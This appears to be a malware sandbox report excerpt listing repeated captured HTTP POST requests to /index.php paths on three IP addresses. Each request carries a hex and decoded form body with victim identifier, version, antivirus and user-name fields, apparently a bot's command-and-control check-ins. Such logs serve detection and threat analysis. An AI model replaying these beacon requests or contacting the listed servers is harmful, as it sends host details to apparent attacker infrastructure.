                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
